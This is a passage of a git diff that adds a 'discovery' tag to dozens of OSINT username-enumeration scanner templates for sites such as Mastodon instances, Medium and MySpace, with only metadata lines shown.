osint,osint-business,martech,discovery self-contained: true diff --git a/http/osint/user-enumeration/massage-anywhere.yaml b/http/osint/user-enumeration/massage-anywhere.yaml index c4299acc8ca..93faf3904df 100644 --- a/http/osint/user-enumeration/massage-anywhere.yaml +++ b/http/osint/user-enumeration/massage-anywhere.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-health,massage-anywhere + tags: osint,osint-health,massage-anywhere,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastoai.yaml b/http/osint/user-enumeration/mastoai.yaml index 3174b8c521e..94e7ff1683d 100644 --- a/http/osint/user-enumeration/mastoai.yaml +++ b/http/osint/user-enumeration/mastoai.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastoai + tags: osint,osint-social,mastoai,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-101010pl.yaml b/http/osint/user-enumeration/mastodon-101010pl.yaml index 0bc6663ac2f..492840b4a58 100644 --- a/http/osint/user-enumeration/mastodon-101010pl.yaml +++ b/http/osint/user-enumeration/mastodon-101010pl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-101010pl + tags: osint,osint-social,mastodon-101010pl,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-api.yaml b/http/osint/user-enumeration/mastodon-api.yaml index dc138925e89..10953211ae6 100644 --- a/http/osint/user-enumeration/mastodon-api.yaml +++ b/http/osint/user-enumeration/mastodon-api.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-api + tags: osint,osint-social,mastodon-api,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-chaossocial.yaml b/http/osint/user-enumeration/mastodon-chaossocial.yaml index 7a58f9ac76f..2417c63752b 100644 --- a/http/osint/user-enumeration/mastodon-chaossocial.yaml +++ b/http/osint/user-enumeration/mastodon-chaossocial.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-chaossocial + tags: osint,osint-social,mastodon-chaossocial,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-climatejusticerocks.yaml b/http/osint/user-enumeration/mastodon-climatejusticerocks.yaml index 7b57003f5b9..6f709d2e163 100644 --- a/http/osint/user-enumeration/mastodon-climatejusticerocks.yaml +++ b/http/osint/user-enumeration/mastodon-climatejusticerocks.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-climatejusticerocks + tags: osint,osint-social,mastodon-climatejusticerocks,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-countersocial.yaml b/http/osint/user-enumeration/mastodon-countersocial.yaml index 5347809f40c..f2bb4473491 100644 --- a/http/osint/user-enumeration/mastodon-countersocial.yaml +++ b/http/osint/user-enumeration/mastodon-countersocial.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-countersocial + tags: osint,osint-social,mastodon-countersocial,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-defcon.yaml b/http/osint/user-enumeration/mastodon-defcon.yaml index 3abb2a8d6ee..0e70c6ca1f8 100644 --- a/http/osint/user-enumeration/mastodon-defcon.yaml +++ b/http/osint/user-enumeration/mastodon-defcon.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-defcon + tags: osint,osint-social,mastodon-defcon,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-eu-voice.yaml b/http/osint/user-enumeration/mastodon-eu-voice.yaml index 529d0c3be03..21e99abdfc9 100644 --- a/http/osint/user-enumeration/mastodon-eu-voice.yaml +++ b/http/osint/user-enumeration/mastodon-eu-voice.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-eu-voice + tags: osint,osint-social,mastodon-eu-voice,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-mastodon.yaml b/http/osint/user-enumeration/mastodon-mastodon.yaml index 1776b206ffb..a8605fcd124 100644 --- a/http/osint/user-enumeration/mastodon-mastodon.yaml +++ b/http/osint/user-enumeration/mastodon-mastodon.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-mastodon + tags: osint,osint-social,mastodon-mastodon,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-meowsocial.yaml b/http/osint/user-enumeration/mastodon-meowsocial.yaml index 7e59c9b098d..3b6991d7d58 100644 --- a/http/osint/user-enumeration/mastodon-meowsocial.yaml +++ b/http/osint/user-enumeration/mastodon-meowsocial.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-meowsocial + tags: osint,osint-social,mastodon-meowsocial,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-mstdnio.yaml b/http/osint/user-enumeration/mastodon-mstdnio.yaml index d24fedbb8df..b94bcfeca72 100644 --- a/http/osint/user-enumeration/mastodon-mstdnio.yaml +++ b/http/osint/user-enumeration/mastodon-mstdnio.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-mstdnio + tags: osint,osint-social,mastodon-mstdnio,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-polsocial.yaml b/http/osint/user-enumeration/mastodon-polsocial.yaml index 67b17aa017f..222998ed15d 100644 --- a/http/osint/user-enumeration/mastodon-polsocial.yaml +++ b/http/osint/user-enumeration/mastodon-polsocial.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-polsocial + tags: osint,osint-social,mastodon-polsocial,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-rigczclub.yaml b/http/osint/user-enumeration/mastodon-rigczclub.yaml index f95a754f45d..6fdbb2fe2c9 100644 --- a/http/osint/user-enumeration/mastodon-rigczclub.yaml +++ b/http/osint/user-enumeration/mastodon-rigczclub.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-rigczclub + tags: osint,osint-social,mastodon-rigczclub,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-social-tchncs.yaml b/http/osint/user-enumeration/mastodon-social-tchncs.yaml index 4044a2b090a..aeb6a46cd34 100644 --- a/http/osint/user-enumeration/mastodon-social-tchncs.yaml +++ b/http/osint/user-enumeration/mastodon-social-tchncs.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-social-tchncs + tags: osint,osint-social,mastodon-social-tchncs,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-social-vivaldi.yaml b/http/osint/user-enumeration/mastodon-social-vivaldi.yaml index ed3b0a96eb7..8aa37fd49a1 100644 --- a/http/osint/user-enumeration/mastodon-social-vivaldi.yaml +++ b/http/osint/user-enumeration/mastodon-social-vivaldi.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: osint,osint-social,mastodon + tags: osint,osint-social,mastodon,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-tflnetpl.yaml b/http/osint/user-enumeration/mastodon-tflnetpl.yaml index 72011f96b0c..661464a4955 100644 --- a/http/osint/user-enumeration/mastodon-tflnetpl.yaml +++ b/http/osint/user-enumeration/mastodon-tflnetpl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-tflnetpl + tags: osint,osint-social,mastodon-tflnetpl,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodon-tootcommunity.yaml b/http/osint/user-enumeration/mastodon-tootcommunity.yaml index 7984f01f313..301c6bf2979 100644 --- a/http/osint/user-enumeration/mastodon-tootcommunity.yaml +++ b/http/osint/user-enumeration/mastodon-tootcommunity.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodon-tootcommunity + tags: osint,osint-social,mastodon-tootcommunity,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodonbooksnet-mastodon-instance.yaml b/http/osint/user-enumeration/mastodonbooksnet-mastodon-instance.yaml index 873b97bdd89..bf2bfa81af4 100644 --- a/http/osint/user-enumeration/mastodonbooksnet-mastodon-instance.yaml +++ b/http/osint/user-enumeration/mastodonbooksnet-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodonbooksnet-mastodon-instance + tags: osint,osint-social,mastodonbooksnet-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodonchasedemdev-mastodon-instance.yaml b/http/osint/user-enumeration/mastodonchasedemdev-mastodon-instance.yaml index cc2b4afc1fc..826eb9ff6cc 100644 --- a/http/osint/user-enumeration/mastodonchasedemdev-mastodon-instance.yaml +++ b/http/osint/user-enumeration/mastodonchasedemdev-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodonchasedemdev-mastodon-instance + tags: osint,osint-social,mastodonchasedemdev-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastodononline.yaml b/http/osint/user-enumeration/mastodononline.yaml index 0c4bbad5381..f305794af7d 100644 --- a/http/osint/user-enumeration/mastodononline.yaml +++ b/http/osint/user-enumeration/mastodononline.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastodononline + tags: osint,osint-social,mastodononline,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastonyc-mastodon-instance.yaml b/http/osint/user-enumeration/mastonyc-mastodon-instance.yaml index d62314edd11..8e3e8a86e90 100644 --- a/http/osint/user-enumeration/mastonyc-mastodon-instance.yaml +++ b/http/osint/user-enumeration/mastonyc-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastonyc-mastodon-instance + tags: osint,osint-social,mastonyc-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/mastown-mastodon-instance.yaml b/http/osint/user-enumeration/mastown-mastodon-instance.yaml index 04f1d4488c5..04cf8df8439 100644 --- a/http/osint/user-enumeration/mastown-mastodon-instance.yaml +++ b/http/osint/user-enumeration/mastown-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mastown-mastodon-instance + tags: osint,osint-social,mastown-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/mcname-minecraft.yaml b/http/osint/user-enumeration/mcname-minecraft.yaml index 59726dcfdcb..58145ec3a22 100644 --- a/http/osint/user-enumeration/mcname-minecraft.yaml +++ b/http/osint/user-enumeration/mcname-minecraft.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,mcname-minecraft + tags: osint,osint-gaming,mcname-minecraft,discovery self-contained: true diff --git a/http/osint/user-enumeration/mcuuid-minecraft.yaml b/http/osint/user-enumeration/mcuuid-minecraft.yaml index 4accffc2a4e..655e809bcd4 100644 --- a/http/osint/user-enumeration/mcuuid-minecraft.yaml +++ b/http/osint/user-enumeration/mcuuid-minecraft.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,mcuuid-minecraft + tags: osint,osint-gaming,mcuuid-minecraft,discovery self-contained: true diff --git a/http/osint/user-enumeration/mediakits.yaml b/http/osint/user-enumeration/mediakits.yaml index 7eaf56b5ae8..5379a79ac00 100644 --- a/http/osint/user-enumeration/mediakits.yaml +++ b/http/osint/user-enumeration/mediakits.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mediakits + tags: osint,osint-social,mediakits,discovery self-contained: true diff --git a/http/osint/user-enumeration/medium.yaml b/http/osint/user-enumeration/medium.yaml index f290f13faa9..fb8bd8f3a8b 100644 --- a/http/osint/user-enumeration/medium.yaml +++ b/http/osint/user-enumeration/medium.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,medium + tags: osint,osint-social,medium,discovery self-contained: true diff --git a/http/osint/user-enumeration/medyczkapl.yaml b/http/osint/user-enumeration/medyczkapl.yaml index a5be830ecb6..2f3166fc947 100644 --- a/http/osint/user-enumeration/medyczkapl.yaml +++ b/http/osint/user-enumeration/medyczkapl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-health,medyczkapl + tags: osint,osint-health,medyczkapl,discovery self-contained: true diff --git a/http/osint/user-enumeration/meet-me.yaml b/http/osint/user-enumeration/meet-me.yaml index 99ff5d5c3ea..60fc15e5df6 100644 --- a/http/osint/user-enumeration/meet-me.yaml +++ b/http/osint/user-enumeration/meet-me.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-dating,meet-me + tags: osint,osint-dating,meet-me,discovery self-contained: true diff --git a/http/osint/user-enumeration/megamodelspl.yaml b/http/osint/user-enumeration/megamodelspl.yaml index 420741af2f2..3b8bdf5aaf9 100644 --- a/http/osint/user-enumeration/megamodelspl.yaml +++ b/http/osint/user-enumeration/megamodelspl.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,megamodelspl + tags: osint,osint-social,megamodelspl,discovery self-contained: true diff --git a/http/osint/user-enumeration/memrise.yaml b/http/osint/user-enumeration/memrise.yaml index e71e8434ee7..f44152595b3 100644 --- a/http/osint/user-enumeration/memrise.yaml +++ b/http/osint/user-enumeration/memrise.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,memrise + tags: osint,osint-hobby,memrise,discovery self-contained: true diff --git a/http/osint/user-enumeration/message-me.yaml b/http/osint/user-enumeration/message-me.yaml index 5fefd60e520..00d96f54893 100644 --- a/http/osint/user-enumeration/message-me.yaml +++ b/http/osint/user-enumeration/message-me.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,message-me + tags: osint,osint-social,message-me,discovery self-contained: true diff --git a/http/osint/user-enumeration/metacritic.yaml b/http/osint/user-enumeration/metacritic.yaml index c215fb88da5..ce600e8a3fd 100644 --- a/http/osint/user-enumeration/metacritic.yaml +++ b/http/osint/user-enumeration/metacritic.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,metacritic + tags: osint,osint-hobby,metacritic,discovery self-contained: true diff --git a/http/osint/user-enumeration/microsoft-technet-community.yaml b/http/osint/user-enumeration/microsoft-technet-community.yaml index 2ba117a7408..107398555a6 100644 --- a/http/osint/user-enumeration/microsoft-technet-community.yaml +++ b/http/osint/user-enumeration/microsoft-technet-community.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,microsoft-technet-community + tags: osint,osint-tech,microsoft-technet-community,discovery self-contained: true diff --git a/http/osint/user-enumeration/minds.yaml b/http/osint/user-enumeration/minds.yaml index ee7f026ee6a..0e031de61a2 100644 --- a/http/osint/user-enumeration/minds.yaml +++ b/http/osint/user-enumeration/minds.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-political,minds + tags: osint,osint-political,minds,discovery self-contained: true diff --git a/http/osint/user-enumeration/minecraft-list.yaml b/http/osint/user-enumeration/minecraft-list.yaml index 2c9ac1aa8fe..e6d93277380 100644 --- a/http/osint/user-enumeration/minecraft-list.yaml +++ b/http/osint/user-enumeration/minecraft-list.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,minecraft-list + tags: osint,osint-gaming,minecraft-list,discovery self-contained: true diff --git a/http/osint/user-enumeration/mintme.yaml b/http/osint/user-enumeration/mintme.yaml index 57280efec4a..fe71da8d248 100644 --- a/http/osint/user-enumeration/mintme.yaml +++ b/http/osint/user-enumeration/mintme.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,mintme + tags: osint,osint-finance,mintme,discovery self-contained: true diff --git a/http/osint/user-enumeration/mistrzowie.yaml b/http/osint/user-enumeration/mistrzowie.yaml index 63c0afd3797..bbf0a338008 100644 --- a/http/osint/user-enumeration/mistrzowie.yaml +++ b/http/osint/user-enumeration/mistrzowie.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,mistrzowie + tags: osint,osint-images,mistrzowie,discovery self-contained: true diff --git a/http/osint/user-enumeration/mix.yaml b/http/osint/user-enumeration/mix.yaml index 61b28693173..28971f68ed3 100644 --- a/http/osint/user-enumeration/mix.yaml +++ b/http/osint/user-enumeration/mix.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mix + tags: osint,osint-social,mix,discovery self-contained: true diff --git a/http/osint/user-enumeration/mixcloud.yaml b/http/osint/user-enumeration/mixcloud.yaml index 16665974c0b..1bc7cd86b05 100644 --- a/http/osint/user-enumeration/mixcloud.yaml +++ b/http/osint/user-enumeration/mixcloud.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,mixcloud + tags: osint,osint-social,mixcloud,discovery self-contained: true diff --git a/http/osint/user-enumeration/mixi.yaml b/http/osint/user-enumeration/mixi.yaml index b28820e4d53..bec59238477 100644 --- a/http/osint/user-enumeration/mixi.yaml +++ b/http/osint/user-enumeration/mixi.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mixi + tags: osint,osint-social,mixi,discovery self-contained: true diff --git a/http/osint/user-enumeration/mixlr.yaml b/http/osint/user-enumeration/mixlr.yaml index 2024129eb9e..cecf3bfef1c 100644 --- a/http/osint/user-enumeration/mixlr.yaml +++ b/http/osint/user-enumeration/mixlr.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,mixlr + tags: osint,osint-music,mixlr,discovery self-contained: true diff --git a/http/osint/user-enumeration/mmorpg.yaml b/http/osint/user-enumeration/mmorpg.yaml index 7465982c9b2..cb794739370 100644 --- a/http/osint/user-enumeration/mmorpg.yaml +++ b/http/osint/user-enumeration/mmorpg.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,mmorpg + tags: osint,osint-gaming,mmorpg,discovery self-contained: true diff --git a/http/osint/user-enumeration/mod-db.yaml b/http/osint/user-enumeration/mod-db.yaml index 98617d69f7c..fdaa2d51bf1 100644 --- a/http/osint/user-enumeration/mod-db.yaml +++ b/http/osint/user-enumeration/mod-db.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,mod-db + tags: osint,osint-gaming,mod-db,discovery self-contained: true diff --git a/http/osint/user-enumeration/moneysavingexpert.yaml b/http/osint/user-enumeration/moneysavingexpert.yaml index cddaec9b0ff..c4a477e57b3 100644 --- a/http/osint/user-enumeration/moneysavingexpert.yaml +++ b/http/osint/user-enumeration/moneysavingexpert.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,moneysavingexpert + tags: osint,osint-finance,moneysavingexpert,discovery self-contained: true diff --git a/http/osint/user-enumeration/monkeytype.yaml b/http/osint/user-enumeration/monkeytype.yaml index 5743f9ab82c..ecf0b5cf986 100644 --- a/http/osint/user-enumeration/monkeytype.yaml +++ b/http/osint/user-enumeration/monkeytype.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-gaming,monkeytype + tags: osint,osint-gaming,monkeytype,discovery self-contained: true diff --git a/http/osint/user-enumeration/moto-trip.yaml b/http/osint/user-enumeration/moto-trip.yaml index 9040c13d00b..d33748cda6b 100644 --- a/http/osint/user-enumeration/moto-trip.yaml +++ b/http/osint/user-enumeration/moto-trip.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: osint,osint-social + tags: osint,osint-social,discovery self-contained: true diff --git a/http/osint/user-enumeration/motokiller.yaml b/http/osint/user-enumeration/motokiller.yaml index e9fa0d3cf2a..b40b685c6de 100644 --- a/http/osint/user-enumeration/motokiller.yaml +++ b/http/osint/user-enumeration/motokiller.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,motokiller + tags: osint,osint-images,motokiller,discovery self-contained: true diff --git a/http/osint/user-enumeration/moxfield.yaml b/http/osint/user-enumeration/moxfield.yaml index f1a7f7bf350..208e71afa7f 100644 --- a/http/osint/user-enumeration/moxfield.yaml +++ b/http/osint/user-enumeration/moxfield.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,moxfield + tags: osint,osint-misc,moxfield,discovery self-contained: true diff --git a/http/osint/user-enumeration/muck-rack.yaml b/http/osint/user-enumeration/muck-rack.yaml index 7092e857654..9dff5a71f64 100644 --- a/http/osint/user-enumeration/muck-rack.yaml +++ b/http/osint/user-enumeration/muck-rack.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-news,muck-rack + tags: osint,osint-news,muck-rack,discovery self-contained: true diff --git a/http/osint/user-enumeration/musiciansocial-mastodon-instance.yaml b/http/osint/user-enumeration/musiciansocial-mastodon-instance.yaml index c5b7cd06fb0..9dc4c734910 100644 --- a/http/osint/user-enumeration/musiciansocial-mastodon-instance.yaml +++ b/http/osint/user-enumeration/musiciansocial-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,musiciansocial-mastodon-instance + tags: osint,osint-social,musiciansocial-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/musictraveler.yaml b/http/osint/user-enumeration/musictraveler.yaml index 3bfdbbfa115..922d41832e7 100644 --- a/http/osint/user-enumeration/musictraveler.yaml +++ b/http/osint/user-enumeration/musictraveler.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,musictraveler + tags: osint,osint-music,musictraveler,discovery self-contained: true diff --git a/http/osint/user-enumeration/my-instants.yaml b/http/osint/user-enumeration/my-instants.yaml index d028b0e0180..79468b2b24d 100644 --- a/http/osint/user-enumeration/my-instants.yaml +++ b/http/osint/user-enumeration/my-instants.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,my-instants + tags: osint,osint-music,my-instants,discovery self-contained: true diff --git a/http/osint/user-enumeration/myanimelist.yaml b/http/osint/user-enumeration/myanimelist.yaml index 86e70de9866..d70688a4b87 100644 --- a/http/osint/user-enumeration/myanimelist.yaml +++ b/http/osint/user-enumeration/myanimelist.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,myanimelist + tags: osint,osint-social,myanimelist,discovery self-contained: true diff --git a/http/osint/user-enumeration/mybuildercom.yaml b/http/osint/user-enumeration/mybuildercom.yaml index c34532100f1..5d00d42cf1a 100644 --- a/http/osint/user-enumeration/mybuildercom.yaml +++ b/http/osint/user-enumeration/mybuildercom.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mybuildercom + tags: osint,osint-social,mybuildercom,discovery self-contained: true diff --git a/http/osint/user-enumeration/mydramalist.yaml b/http/osint/user-enumeration/mydramalist.yaml index 7daac32e0d9..ddedfdafc36 100644 --- a/http/osint/user-enumeration/mydramalist.yaml +++ b/http/osint/user-enumeration/mydramalist.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-social,mydramalist + tags: osint,osint-social,mydramalist,discovery self-contained: true diff --git a/http/osint/user-enumeration/myfitnesspal-author.yaml b/http/osint/user-enumeration/myfitnesspal-author.yaml index 5419677576a..ef4faf94242 100644 --- a/http/osint/user-enumeration/myfitnesspal-author.yaml +++ b/http/osint/user-enumeration/myfitnesspal-author.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-health,myfitnesspal-author + tags: osint,osint-health,myfitnesspal-author,discovery self-contained: true diff --git a/http/osint/user-enumeration/myfitnesspal-community.yaml b/http/osint/user-enumeration/myfitnesspal-community.yaml index 414a9c09ac2..c1f351b765f 100644 --- a/http/osint/user-enumeration/myfitnesspal-community.yaml +++ b/http/osint/user-enumeration/myfitnesspal-community.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-health,myfitnesspal-community + tags: osint,osint-health,myfitnesspal-community,discovery self-contained: true diff --git a/http/osint/user-enumeration/mylot.yaml b/http/osint/user-enumeration/mylot.yaml index 8154da35c0f..3cbb690ef59 100644 --- a/http/osint/user-enumeration/mylot.yaml +++ b/http/osint/user-enumeration/mylot.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mylot + tags: osint,osint-social,mylot,discovery self-contained: true diff --git a/http/osint/user-enumeration/mymfans.yaml b/http/osint/user-enumeration/mymfans.yaml index 3c1695a3536..68fca52f440 100644 --- a/http/osint/user-enumeration/mymfans.yaml +++ b/http/osint/user-enumeration/mymfans.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,mymfans + tags: osint,osint-social,mymfans,discovery self-contained: true diff --git a/http/osint/user-enumeration/myportfolio.yaml b/http/osint/user-enumeration/myportfolio.yaml index 14ce9d18932..99f86a0190e 100644 --- a/http/osint/user-enumeration/myportfolio.yaml +++ b/http/osint/user-enumeration/myportfolio.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,myportfolio + tags: osint,osint-misc,myportfolio,discovery self-contained: true diff --git a/http/osint/user-enumeration/myspace.yaml b/http/osint/user-enumeration/myspace.yaml index c4f1ceb7688..8cdebf8f81b 100644 --- a/http/osint/user-enumeration/myspace.yaml +++ b/http/osint/user-enumeration/myspace.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,myspace + tags: osint,osint-social,myspace,discovery self-contained: true diff --git a/http/osint/user-enumeration/myspreadshop.yaml b/http/osint/user-enumeration/myspreadshop.yaml index 1af3f3c1dd6..b820a98df7b 100644 --- a/http/osint/user-enumeration/myspreadshop.yaml +++ b/http/osint/user-enumeration/myspreadshop.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,myspreadshop + tags: osint,osint-business,myspreadshop,discovery self-contained: true diff --git a/http/osint/user-enumeration/naija-planet.yaml b/http/osint/user-enumeration/naija-planet.yaml index d225478ad67..385a5e90fa6 100644 --- a/http/osint/user-enumeration/naija-planet.yaml +++ b/http/osint/user-enumeration/naija-planet.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-dating,naija-planet + tags: osint,osint-dating,naija-planet,discovery self-contained: true diff --git a/http/osint/user-enumeration/nairaland.yaml b/http/osint/user-enumeration/nairaland.yaml index 4fcbd0190ce..6c0b281b285 100644 --- a/http/osint/user-enumeration/nairaland.yaml +++ b/http/osint/user-enumeration/nairaland.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-news,nairaland + tags: osint,osint-news,nairaland,discovery self-contained: true diff --git a/http/osint/user-enumeration/nationstates-nation.yaml b/http/osint/user-enumeration/nationstates-nation.yaml index e7412e2cb58..a33b9580cd0 100644 --- a/http/osint/user-enumeration/nationstates-nation.yaml +++ b/http/osint/user-enumeration/nationstates-nation.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 verified: true - tags: osint,osint-gaming,nationstates + tags: osint,osint-gaming,nationstates,discovery self-contained: true diff --git a/http/osint/user-enumeration/naturalnews.yaml b/http/osint/user-enumeration/naturalnews.yaml index 48eee43e2dc..c4c18e52730 100644 --- a/http/osint/user-enumeration/naturalnews.yaml +++ b/http/osint/user-enumeration/naturalnews.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-political,naturalnews + tags: osint,osint-political,naturalnews,discovery self-contained: true diff --git a/http/osint/user-enumeration/naver.yaml b/http/osint/user-enumeration/naver.yaml index f6d4caf1537..892df9f212d 100644 --- a/http/osint/user-enumeration/naver.yaml +++ b/http/osint/user-enumeration/naver.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,naver + tags: osint,osint-social,naver,discovery self-contained: true diff --git a/http/osint/user-enumeration/nest-owasp.yaml b/http/osint/user-enumeration/nest-owasp.yaml index 5a47410cd36..7c5311e552a 100644 --- a/http/osint/user-enumeration/nest-owasp.yaml +++ b/http/osint/user-enumeration/nest-owasp.yaml @@ -13,7 +13,7 